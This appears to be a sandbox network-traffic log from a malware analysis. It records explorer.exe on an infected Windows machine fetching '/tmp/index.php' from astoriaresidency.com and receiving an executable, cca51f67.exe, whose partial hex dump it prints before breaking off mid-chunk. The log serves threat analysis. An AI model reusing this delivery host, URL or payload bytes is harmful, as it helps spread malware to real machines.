2023-06-21 02:28:21 UTC	1106	IN	Data Raw: 32 30 30 30 0d 0a 80 00 00 ff 80 00 00 ff c0 00 01 ff e0 00 03 ff f0 00 03 ff f0 00 07 ff e0 00 1f ff e0 00 3f ff e0 00 3f ff e0 00 3f ff e0 00 3f ff e0 00 7f ff f0 00 7f ff fc 01 ff ff ff ff ff ff ff ff ff ff 28 00 00 00 10 00 00 00 20 00 00 00 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 7d 7b 00 7a 82 80 00 80 81 7d 00 79 84 7a 00 80 7e 80 00 7b 7f 7f 00 83 7f 7e 00 7b 83 85 00 7a 7d 7c 00 7c 7e 83 00 84 7f 83 00 7b 80 82 00 7c 7d 83 00 7f 80 7c 00 80 79 7b 00 79 7e 7b 00 7c 7f 81 00 83 83 7f 00 7d 7c 7a 00 7e 81 7e 00 79 7c 81 00 80 7d 7e 00 80 7b 7f 00 84 82 84 00 7c 85 7d 00 7e 84 7f 00 7c 80 83 00 7d 7d 83 00 81 82 7a 00 7e 7d 82 00 80 7a 7d 00 7d 84 7e 00 7b 7c 7f 00 81 84 7b 00 81 7c 82 00 7c 7e 84 00 7d Data Ascii: 2000????( }{z}yz~{~{z}\|\|~{\|}\|y{y~{\|}\|z~~y\|}~{\|}~\|}}z~}z}}~{\|{\|\|~}
2023-06-21 02:28:21 UTC	1114	IN	Data Raw: 81 83 80 83 81 85 Data Ascii:
2023-06-21 02:28:21 UTC	1114	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	1114	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 7e 83 7d 81 82 82 7f 7d 83 80 80 7c 7c 82 82 7d 83 7f 7f 7d 7e 7f 81 81 7a 82 80 83 80 7d 84 7b 7e 83 80 83 7c 7f 7d 85 80 82 83 7b 82 7d 7f 82 7f 83 7a 7f 7f 83 84 82 7d 7b 82 80 84 7e 7f 7f 7c 7f 7c 7e 7e 83 83 86 82 7f 7b 81 7f 80 81 82 7e 7f 7e 83 84 84 7a 7e 7d 82 7c 80 7f 82 7f 7f 7c 83 84 7e 7f 82 84 84 7d 83 7e 84 7b 7f 7b 7b 84 7f 7e 7c 7b 7f 81 7b 80 7f 80 7b 7a 81 7e 7c 80 79 81 81 7a 7d 7d 82 7c 81 7c 7f 82 80 7c 82 79 7e 83 84 81 7d 81 7b 82 83 7c 7d 84 80 7f 80 7e 7b 7d 7f 7b 85 7c 81 81 7d 80 81 82 83 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 83 7b 7d 80 81 83 7b 7d 79 85 81 81 7f 82 7f 79 7f 7c 7a 7f 85 7f 82 84 80 7e 80 81 7a 80 82 7f 82 81 83 7f Data Ascii: 2000~~}}\|\|}}~z}{~\|}{}z}{~\|\|~~{~~z~}\|\|~}~{{{~\|{{{z~\|yz}}\|\|\|y~}{\|}~{}{\|}{}{}yy\|z~z
2023-06-21 02:28:21 UTC	1122	IN	Data Raw: 7c 83 7f 80 83 7f Data Ascii: \|
2023-06-21 02:28:21 UTC	1122	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	1122	IN	Data Raw: 31 66 66 38 0d 0a 83 79 80 7b 84 85 81 7a 83 81 7c 84 83 83 7d 82 80 7e 82 7d 81 85 7e 7d 7f 84 7d 82 82 7f 83 81 7f 80 81 82 7c 83 81 80 84 7f 7f 81 7f 7c 80 82 85 80 83 7d 83 7c 7b 86 00 00 00 00 00 00 00 00 80 85 7b 82 85 85 81 82 7f 7e 80 7c 80 82 83 84 80 83 7e 7b 7f 7e 7e 80 82 83 84 7a 7f 83 86 7e 82 84 79 7c 7b 7c 7d 85 80 7d 7c 80 7c 7f 7a 80 79 7f 7d 7c 82 80 82 7e 80 7d 81 84 7c 7d 7a 84 7c 83 7f 84 7e 7b 85 81 82 7a 7b 82 7e 84 82 7c 83 7b 7a 7d 80 80 7c 83 00 00 00 00 00 00 00 00 81 7c 7b 81 7b 7c 80 85 81 7a 81 7d 7b 7e 7a 81 7e 82 82 7b 7b 7f 7d 7d 81 7d 83 83 85 81 83 7f 83 83 7b 7a 7f 7f 7e 7b 81 81 7e 7c 7e 80 82 81 80 84 7f 7d 83 80 7e 80 7c 81 7f 82 83 79 81 7c 7e 83 83 84 81 85 82 7d 82 7c 81 83 80 7f 82 82 83 7c 82 81 7f 7f 81 7f 00 Data Ascii: 1ff8y{z\|}~}~}}\|\|}\|{{~\|~{~~z~y\|{\|}}\|\|zy}\|~}\|}z\|~{z{~\|{z}\|\|{{\|z}{~z~{{}}}{z~{~\|~}~\|y\|~}\|\|
2023-06-21 02:28:21 UTC	1130	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-06-21 02:28:21 UTC	1130	IN	Data Raw: 68 00 65 00 63 00 61 00 78 00 75 00 72 00 20 00 79 00 75 00 76 00 65 00 63 00 65 00 70 00 20 00 78 00 69 00 6c 00 6f 00 6e 00 75 00 79 00 61 00 77 00 75 00 20 00 64 00 69 00 68 00 75 00 66 00 6f 00 77 00 69 00 73 00 69 00 78 00 20 00 76 00 75 00 68 00 75 00 6a 00 6f 00 20 00 72 00 65 00 68 00 61 00 6d 00 75 00 78 00 20 00 6e 00 75 00 63 00 75 00 79 00 69 00 6b 00 69 00 6c 00 65 00 20 00 79 00 75 00 73 00 69 00 6b 00 69 00 70 00 75 00 6c 00 69 00 79 00 6f 00 6d 00 6f 00 20 00 67 00 75 00 62 00 61 00 66 00 75 00 63 00 65 00 6e 00 69 00 77 00 75 00 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: hecaxur yuvecep xilonuyawu dihufowisix vuhujo rehamux nucuyikile yusikipuliyomo gubafuceniwum
2023-06-21 02:28:21 UTC	1138	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	1138	IN	Data Raw: 34 31 38 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 418

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49707	103.233.24.19	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:27:43 UTC	2	OUT	GET /tmp/index.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: astoriaresidency.com
2023-06-21 02:27:43 UTC	2	IN	HTTP/1.1 200 OK Date: Wed, 21 Jun 2023 02:27:43 GMT Server: Apache Content-Description: File Transfer Content-Disposition: attachment; filename=cca51f67.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Connection: close Transfer-Encoding: chunked Content-Type: application/octet-stream
2023-06-21 02:27:43 UTC	2	IN	Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 47 99 07 c8 03 f8 69 9b 03 f8 69 9b 03 f8 69 9b 1d aa fc 9b 12 f8 69 9b 1d aa ed 9b 33 f8 69 9b 1d aa ea 9b 65 f8 69 9b 24 3e 12 9b 0a f8 69 9b 03 f8 68 9b 8b f8 69 9b 1d aa e3 9b 02 f8 69 9b 1d aa fd 9b 02 f8 69 9b 1d aa f8 9b 02 f8 69 9b 52 69 63 68 03 f8 69 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4b Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$Giiii3iei$>ihiiiiRichiPELK
2023-06-21 02:27:43 UTC	10	IN	Data Raw: 84 29 40 00 80 29 40 00 7c 29 40 00 78 29 40 00 74 29 40 00 70 29 40 00 6c 29 40 00 68 29 40 00 64 29 40 00 60 29 40 00 5c 29 40 00 58 29 40 00 54 29 40 00 50 29 40 00 4c 29 40 00 48 29 40 00 44 29 40 00 40 29 40 00 3c 29 40 00 38 29 40 00 34 29 40 00 30 29 40 00 2c 29 40 00 28 29 40 00 24 29 40 00 20 29 40 00 1c 29 40 00 18 29 40 00 14 29 40 00 08 29 40 00 fc 28 40 00 f4 28 40 00 e8 28 40 00 d0 28 40 00 c4 28 40 00 b0 28 40 00 90 28 40 00 70 28 40 00 50 28 40 00 30 28 40 00 10 28 40 00 ec 27 40 00 d0 27 40 00 ac 27 40 00 8c 27 40 00 64 27 40 00 48 27 40 00 38 27 40 00 34 27 40 00 2c 27 40 00 1c 27 40 00 f8 26 40 00 f0 26 40 00 e4 26 40 00 d4 26 40 00 b8 26 40 00 98 26 40 00 70 26 40 00 48 26 40 00 20 26 40 00 f4 25 40 00 d8 25 40 00 b4 25 40 00 90 25 40 Data Ascii: )@)@\|)@x)@t)@p)@l)@h)@d)@`)@\)@X)@T)@P)@L)@H)@D)@@)@<)@8)@4)@0)@,)@()@$)@ )@)@)@)@)@(@(@(@(@(@(@(@p(@P(@0(@(@'@'@'@'@d'@H'@8'@4'@,'@'@&@&@&@&@&@&@p&@H&@ &@%@%@%@%@
2023-06-21 02:27:43 UTC	10	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:43 UTC	10	IN	Data Raw: 32 30 30 30 0d 0a 65 57 69 6e 64 6f 77 00 4d 65 73 73 61 67 65 42 6f 78 41 00 55 53 45 52 33 32 2e 44 4c 4c 00 00 53 75 6e 4d 6f 6e 54 75 65 57 65 64 54 68 75 46 72 69 53 61 74 00 00 00 4a 61 6e 46 65 62 4d 61 72 41 70 72 4d 61 79 4a 75 6e 4a 75 6c 41 75 67 53 65 70 4f 63 74 4e 6f 76 44 65 63 00 00 00 00 43 4f 4e 4f 55 54 24 00 62 61 64 20 61 6c 6c 6f 63 61 74 69 6f 6e 00 00 6e 00 61 00 67 00 65 00 79 00 65 00 76 00 65 00 7a 00 75 00 73 00 61 00 20 00 6e 00 61 00 68 00 69 00 76 00 6f 00 68 00 65 00 78 00 69 00 70 00 65 00 6d 00 65 00 6a 00 65 00 6e 00 61 00 72 00 20 00 67 00 6f 00 62 00 6f 00 6e 00 65 00 7a 00 6f 00 78 00 69 00 77 00 75 00 6c 00 6f 00 79 00 69 00 6c 00 61 00 6b 00 69 00 64 00 69 00 72 00 65 00 77 00 69 00 6a 00 75 00 76 00 65 00 74 00 69 Data Ascii: 2000eWindowMessageBoxAUSER32.DLLSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecCONOUT$bad allocationnageyevezusa nahivohexipemejenar gobonezoxiwuloyilakidirewijuveti
2023-06-21 02:27:43 UTC	18	IN	Data Raw: 06 70 12 40 00 74 Data Ascii: p@t
2023-06-21 02:27:43 UTC	18	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:43 UTC	18	IN	Data Raw: 32 30 30 30 0d 0a 07 56 e8 61 0d 00 00 59 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 8b 45 08 8b 08 85 c9 74 11 e8 ee ea ff ff 85 c0 74 08 8b 10 6a 01 8b c8 ff 12 5d c3 8b ff 55 8b ec 51 6a 00 8d 4d fc e8 13 ff ff ff 68 68 a0 42 00 e8 c5 ff ff ff 83 25 68 a0 42 00 00 59 8d 4d fc e8 21 ff ff ff c9 c3 a1 68 a0 42 00 c3 8b ff 55 8b ec 80 3d 8c a0 42 00 00 75 12 68 30 4c 40 00 c6 05 8c a0 42 00 01 e8 18 06 00 00 59 8b 45 08 a3 68 a0 42 00 5d c3 6a 04 b8 d8 3b 42 00 e8 58 23 00 00 6a 00 8d 4d f0 e8 b1 fe ff ff 8b 7d 08 83 65 fc 00 8b 77 0c eb 1f 8b 47 08 4e 8d 04 b0 83 38 00 74 13 8b 08 e8 4f ea ff ff 85 c0 74 08 8b 10 6a 01 8b c8 ff 12 85 f6 77 dd ff 77 08 e8 86 1e 00 00 83 4d fc ff 59 8d 4d f0 e8 95 fe ff ff e8 6e 23 00 00 c3 8b ff 55 8b ec 83 7d 08 00 56 74 2b 8b Data Ascii: 2000VaY^]UEttj]UQjMhhB%hBYM!hBU=Buh0L@BYEhB]j;BX#jM}ewGN8tOtjwwMYMn#U}Vt+
2023-06-21 02:27:43 UTC	26	IN	Data Raw: 89 45 fc 64 8b 1d Data Ascii: Ed
2023-06-21 02:27:43 UTC	26	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:43 UTC	26	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 8b 03 64 a3 00 00 00 00 8b 45 08 8b 5d 0c 8b 6d fc 8b 63 fc ff e0 5b c9 c2 08 00 58 59 87 04 24 ff e0 58 59 87 04 24 ff e0 58 59 87 04 24 ff e0 8b ff 55 8b ec 51 51 53 56 57 64 8b 35 00 00 00 00 89 75 fc c7 45 f8 5f 6c 40 00 6a 00 ff 75 0c ff 75 f8 ff 75 08 e8 af 88 00 00 8b 45 0c 8b 40 04 83 e0 fd 8b 4d 0c 89 41 04 64 8b 3d 00 00 00 00 8b 5d fc 89 3b 64 89 1d 00 00 00 00 5f 5e 5b c9 c2 08 00 55 8b ec 83 ec 08 53 56 57 fc 89 45 fc 33 c0 50 50 50 ff 75 fc ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 c0 fb ff ff 83 c4 20 89 45 f8 5f 5e 5b 8b 45 f8 8b e5 5d c3 8b ff 55 8b ec 56 fc 8b 75 0c 8b 4e 08 33 ce e8 0f 03 00 00 6a 00 56 ff 76 14 ff 76 0c 6a 00 ff 75 10 ff 76 10 ff 75 08 e8 83 fb ff ff 83 c4 20 5e 5d c3 8b ff 55 8b ec 83 ec 38 Data Ascii: 2000dE]mc[XY$XY$XY$UQQSVWd5uE_l@juuuE@MAd=];d_^[USVWE3PPPuuuuu E_^[E]UVuN3jVvvjuvu ^]U8
2023-06-21 02:27:43 UTC	34	IN	Data Raw: e8 0a fb ff ff 59 Data Ascii: Y
2023-06-21 02:27:43 UTC	34	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:43 UTC	34	IN	Data Raw: 32 30 30 30 0d 0a ff d0 85 c0 74 1b 6a 00 56 e8 e7 fb ff ff 59 59 ff 15 3c 11 40 00 83 4e 04 ff 89 06 33 c0 40 eb 07 e8 92 fb ff ff 33 c0 5f 5e c3 8b ff 55 8b ec 56 57 33 f6 ff 75 08 e8 6a f8 ff ff 8b f8 59 85 ff 75 27 39 05 10 a1 42 00 76 1f 56 ff 15 e8 10 40 00 8d 86 e8 03 00 00 3b 05 10 a1 42 00 76 03 83 c8 ff 8b f0 83 f8 ff 75 ca 8b c7 5f 5e 5d c3 8b ff 55 8b ec 56 57 33 f6 6a 00 ff 75 0c ff 75 08 e8 ea f8 ff ff 8b f8 83 c4 0c 85 ff 75 27 39 05 10 a1 42 00 76 1f 56 ff 15 e8 10 40 00 8d 86 e8 03 00 00 3b 05 10 a1 42 00 76 03 83 c8 ff 8b f0 83 f8 ff 75 c3 8b c7 5f 5e 5d c3 8b ff 55 8b ec 56 57 33 f6 ff 75 0c ff 75 08 e8 4d 4a 00 00 8b f8 59 59 85 ff 75 2c 39 45 0c 74 27 39 05 10 a1 42 00 76 1f 56 ff 15 e8 10 40 00 8d 86 e8 03 00 00 3b 05 10 a1 42 00 76 Data Ascii: 2000tjVYY<@N3@3_^UVW3ujYu'9BvV@;Bvu_^]UVW3juuu'9BvV@;Bvu_^]UVW3uuMJYYu,9Et'9BvV@;Bv
2023-06-21 02:27:43 UTC	42	IN	Data Raw: ba 03 00 00 00 83 Data Ascii:
2023-06-21 02:27:43 UTC	42	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:43 UTC	42	IN	Data Raw: 32 30 30 30 0d 0a f9 04 72 0c 83 e0 03 2b c8 ff 24 85 14 ac 40 00 ff 24 8d 10 ad 40 00 90 24 ac 40 00 48 ac 40 00 70 ac 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 10 ad 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 10 ad 40 00 90 8a 46 03 23 d1 88 47 03 8a 46 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24 95 10 ad 40 00 8d 49 00 c4 ac 40 00 cc ac 40 00 d4 ac 40 00 dc ac 40 00 e4 ac 40 00 ec ac 40 00 f4 ac 40 00 07 ad 40 00 8b 44 8e 1c 89 44 8f 1c 8b 44 8e 18 89 44 8f 18 8b 44 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89 44 8f 08 8b 44 8e 04 89 Data Ascii: 2000r+$@$@$@H@p@F#Gr$@IF#GFGr$@F#GFGFGV$@I@@@@@@@@DDDDDDDDDDDDD
2023-06-21 02:27:43 UTC	50	IN	Data Raw: ff 56 56 56 56 56 Data Ascii: VVVVV
2023-06-21 02:27:43 UTC	50	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:43 UTC	50	IN	Data Raw: 32 30 30 30 0d 0a c7 00 16 00 00 00 e8 33 b7 ff ff 83 c4 14 83 c8 ff e9 be 06 00 00 53 57 8b 7d 08 8b c7 c1 f8 05 8d 34 85 20 32 4b 00 8b 06 83 e7 1f c1 e7 06 03 c7 8a 58 24 02 db d0 fb 89 b5 28 e5 ff ff 88 9d 27 e5 ff ff 80 fb 02 74 05 80 fb 01 75 30 8b 4d 10 f7 d1 f6 c1 01 75 26 e8 5c b7 ff ff 33 f6 89 30 e8 40 b7 ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 c8 b6 ff ff 83 c4 14 e9 43 06 00 00 f6 40 04 20 74 11 6a 02 6a 00 6a 00 ff 75 08 e8 7e fd ff ff 83 c4 10 ff 75 08 e8 69 07 00 00 59 85 c0 0f 84 9d 02 00 00 8b 06 f6 44 07 04 80 0f 84 90 02 00 00 e8 9d bc ff ff 8b 40 6c 33 c9 39 48 14 8d 85 1c e5 ff ff 0f 94 c1 50 8b 06 ff 34 07 89 8d 20 e5 ff ff ff 15 a0 11 40 00 85 c0 0f 84 60 02 00 00 33 c9 39 8d 20 e5 ff ff 74 08 84 db 0f 84 50 02 00 00 ff 15 9c 11 Data Ascii: 20003SW}4 2KX$('tu0Mu&\30@VVVVVC@ tjjju~uiYD@l39HP4 @`39 tP
2023-06-21 02:27:43 UTC	58	IN	Data Raw: 01 ff 75 e4 e8 55 Data Ascii: uU
2023-06-21 02:27:43 UTC	58	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:43 UTC	58	IN	Data Raw: 31 66 66 38 0d 0a d3 ff ff 59 8b 45 e0 8d 65 c0 5f 5e 5b 8b 4d fc 33 cd e8 ca 83 ff ff c9 c3 8b ff 55 8b ec 8b 4d 08 53 33 db 3b cb 56 57 7c 5b 3b 0d 04 32 4b 00 73 53 8b c1 c1 f8 05 8b f1 8d 3c 85 20 32 4b 00 8b 07 83 e6 1f c1 e6 06 03 c6 f6 40 04 01 74 35 83 38 ff 74 30 83 3d 44 61 42 00 01 75 1d 2b cb 74 10 49 74 08 49 75 13 53 6a f4 eb 08 53 6a f5 eb 03 53 6a f6 ff 15 b0 11 40 00 8b 07 83 0c 06 ff 33 c0 eb 15 e8 1c 97 ff ff c7 00 09 00 00 00 e8 24 97 ff ff 89 18 83 c8 ff 5f 5e 5b 5d c3 8b ff 55 8b ec 8b 45 08 83 f8 fe 75 18 e8 08 97 ff ff 83 20 00 e8 ed 96 ff ff c7 00 09 00 00 00 83 c8 ff 5d c3 56 33 f6 3b c6 7c 22 3b 05 04 32 4b 00 73 1a 8b c8 83 e0 1f c1 f9 05 8b 0c 8d 20 32 4b 00 c1 e0 06 03 c1 f6 40 04 01 75 24 e8 c7 96 ff ff 89 30 e8 ad 96 ff ff Data Ascii: 1ff8YEe_^[M3UMS3;VW\|[;2KsS< 2K@t58t0=DaBu+tItIuSjSjSj@3$_^[]UEu ]V3;\|";2Ks 2K@u$0
2023-06-21 02:27:43 UTC	66	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-06-21 02:27:43 UTC	66	IN	Data Raw: 92 01 91 be a0 b8 36 0d b4 59 9a ce a6 05 02 8b ad ae 34 48 66 31 4a a0 ae e0 3d bf 90 59 42 a4 9a 11 c0 f5 c9 a5 73 19 64 de 67 dc 78 59 5d 18 3a d5 1b 34 a1 e4 06 7e c0 9d b8 11 cd f6 1f f3 20 10 cb f0 4a 8d 72 47 fd 79 37 2b c5 5e 1f 03 d1 08 86 44 e0 5e e6 da 4c 11 95 fd 3a fa fa ea be 46 65 b9 df 39 c1 33 a6 83 09 27 03 29 fd 8e 59 3f 5c 43 b1 8e 79 ab a9 a8 3e a7 ad 0c 9b 47 87 33 01 25 19 94 78 2d e7 b8 7e 50 17 45 9e bb 33 80 24 da c6 cf 48 04 0e e3 ba 2e 22 01 d5 63 39 b6 c1 1f 63 01 26 4f d5 be e4 3f fb 6f c3 28 5b 8b 48 83 ae 92 94 a5 6d b0 e5 22 4a 5a c2 c5 07 b8 ad 14 e0 f9 cb 4f f1 bb 0f 3f 14 7d 7f ac d8 51 b5 7f e6 df 95 0f e1 6f 84 eb 4a 5d 09 5b 3f 7d 2c 33 e2 e8 b9 5a d2 22 77 d8 35 7b 94 ab c0 ab af 93 be 96 72 ac f3 d5 f9 34 00 8a 05 Data Ascii: 6Y4Hf1J=YBsdgxY]:4~ JrGy7+^D^L:Fe93')Y?\Cy>G3%x-~PE3$H."c9c&O?o([Hm"JZO?}QoJ][?},3Z"w5{r4
2023-06-21 02:27:43 UTC	74	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:43 UTC	74	IN	Data Raw: 32 30 30 30 0d 0a 55 4a e8 39 3f 2c 5b 6f cf b1 3a fd 1b ce 91 34 ef 9e 4c 7b a7 18 05 73 54 9c e6 d2 8e 69 6b 16 38 79 c4 51 d7 c8 44 0a 93 d0 57 06 de 49 d4 34 c9 e0 58 53 e9 41 b1 7d cc 50 be 1b 26 72 45 d5 fe f9 ac 63 3b 0d b8 eb 33 84 b8 5e 79 f4 9f 11 86 ee a9 da 9f 6d 14 5b c7 8e 19 f6 bf 29 76 25 1d db 0b 67 57 f2 c0 a7 5f 25 f8 e3 92 66 d8 0c a8 db 88 37 94 27 cc 15 74 60 b7 1c 76 7a 46 d5 18 e4 74 89 b5 34 81 82 6c 6e 1f 90 1b 31 7e bf fd 6d fb 0e 7d 1d 0f 1b 04 8a b1 30 fd ad 0c 98 a4 99 6c 15 39 1d a7 0d 97 7b ed 3b cf 2d e9 60 cf 02 c5 b1 cd 4b 95 db ab b0 64 3b b0 bb 37 17 bd 2b 8b 6c 5b 67 6f 1c 93 6d bb 1a 75 14 5b 80 97 3a d1 e9 ca 17 8c 22 0f a6 b1 b9 a9 b8 19 d3 e1 fd d1 6b 81 cd 1c 5a 63 96 98 74 69 57 08 4d d9 47 cc 8d 23 cb ce 8f 15 Data Ascii: 2000UJ9?,[o:4L{sTik8yQDWI4XSA}P&rEc;3^ym[)v%gW_%f7't`vzFt4ln1~m}0l9{;-`Kd;7+l[gomu[:"kZctiWMG#
2023-06-21 02:27:43 UTC	82	IN	Data Raw: 9f 48 20 69 46 24 Data Ascii: H iF$
2023-06-21 02:27:43 UTC	82	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:43 UTC	82	IN	Data Raw: 32 30 30 30 0d 0a 72 99 9f 79 23 a1 1b 04 78 6e cf f9 bc 46 4b 1f 1b 2b 27 10 93 01 e4 8a 54 c7 10 f9 d3 33 15 68 f5 f0 05 57 5f cc cd 16 c6 c2 a1 d1 5a 1b d4 74 eb c7 a1 5a b5 ab 19 1a bd 4f f9 99 0b d5 4e 30 3f 6d b4 3d 2e 07 72 32 60 16 b1 8a 6a 9d e0 d3 20 5a f2 82 5a 1b e4 f7 9e 0b cd 51 79 6a 37 ff 1c c6 11 84 77 32 15 74 d7 69 3f 2f 2c 8a 15 3a 0e b4 06 3f 0f 55 5d c6 1d fa ce 8e f0 66 55 4e b7 d3 54 f3 a6 9c dd c9 0e a1 cc 55 e0 d2 ef 59 93 00 61 64 e4 4b 13 27 3a dd dd 41 36 05 68 f0 66 83 f6 07 e3 c8 ec a9 9a 38 f5 84 73 44 7d 6d e7 82 a4 21 21 07 b6 8a 8a 3e 91 9e c6 be cc 21 e2 bc d1 79 c2 5d 0e 96 d7 8d 55 9f 5f 8d cb 9e 7f bf 7d 22 7a 70 6a e4 3f ea 7a a8 4e 47 c5 ac 46 1b 9d d6 1e 9e 4c e6 ad f5 07 7d 0b eb 27 81 d0 ff e7 db d3 d5 9b e0 e7 Data Ascii: 2000ry#xnFK+'T3hW_ZtZON0?m=.r2`j ZZQyj7w2ti?/,:?U]fUNTUYadK':A6hf8sD}m!!>!y]U_}"zpj?zNGFL}'
2023-06-21 02:27:43 UTC	90	IN	Data Raw: 2a 82 72 55 05 c8 Data Ascii: *rU
2023-06-21 02:27:43 UTC	90	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:43 UTC	90	IN	Data Raw: 32 30 30 30 0d 0a 4c c9 87 ae e3 79 bd e0 f1 da eb 6b 05 df ab eb be 47 d1 a8 4c d3 4f 54 a3 d5 29 17 9a 64 81 b7 08 9d 80 33 30 84 e3 d9 bd 97 68 de 23 4a 1d b8 2c 44 a9 de 36 e0 d1 6f f9 63 82 24 a7 94 68 93 f2 43 f2 76 bf 8e de c1 30 38 10 6a 56 7a 04 af 33 2e d9 a9 ab fc f5 98 0a 69 d0 f8 f3 8e c1 08 61 5c f9 5a c9 99 29 7e 42 76 5a 81 7d d4 52 53 a6 f7 8b 01 73 84 53 0f e7 79 ad 58 61 f9 d9 40 96 33 99 2a de a4 2a f1 ca dc 7c 3f 9f f5 99 42 70 d7 ce 25 e1 0d bf e5 c6 ff 0c 77 be 32 94 64 3a d8 4f 3f 3e 3a d7 ba ba 85 79 6f 01 eb 68 6d 50 73 11 c8 15 d1 f9 06 d2 68 ca f7 de 04 c4 a4 0f db 9d 1d b8 67 3b c6 13 90 5a 86 ef 29 39 47 34 ac a1 21 13 bc f8 6d ac d7 9c ef 74 e9 db c0 75 8e 60 de a4 85 a2 6d 89 9e 6d e4 e9 50 72 ba 75 6e 1a 81 b9 37 52 5e 10 Data Ascii: 2000LykGLOT)d30h#J,D6oc$hCv08jVz3.ia\Z)~BvZ}RSsSyXa@3**\|?Bp%w2d:O?>:yohmPshg;Z)9G4!mtu`mmPrun7R^
2023-06-21 02:27:43 UTC	98	IN	Data Raw: 8f 75 93 cb e4 92 Data Ascii: u
2023-06-21 02:27:43 UTC	98	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:43 UTC	98	IN	Data Raw: 32 30 30 30 0d 0a e9 2f dc 7c 33 1a c3 9a 68 a8 94 ec 30 46 4b dd 80 2f e0 c2 a6 54 ba 7c a2 f4 3a 25 70 22 43 de 81 6a fd 27 68 63 86 e4 51 02 a0 53 c6 88 89 9d 38 5e 94 25 8f 11 56 28 02 9e 2b e0 7c 38 cd 15 29 a6 e3 23 39 51 b8 91 b2 1a 9e 51 2e 4f 14 87 a5 bf 22 21 47 aa e8 8e 49 e0 27 ae dc a3 a9 4c 24 56 7c e9 a0 31 bf b1 6c 82 a1 2e 1b 32 c6 03 28 fa 1f 4a bd da 41 b4 8f cc c6 ee db 35 c8 3e 26 6c b5 c2 12 fb 14 ff c9 29 8e 50 ef 34 70 47 4f 0e 3f c3 be 62 d3 19 7b c0 b4 d0 8b f1 41 8f ba 9a ba 51 1f 49 b4 a5 5b 12 cf e1 25 f2 4b 81 17 b4 ac d9 78 02 7d 1b f9 76 8c 00 a0 35 ca d5 f1 eb 58 c9 79 da 41 2d 7a 18 b9 a3 03 9c 3b 55 c6 c5 ce 7e 13 99 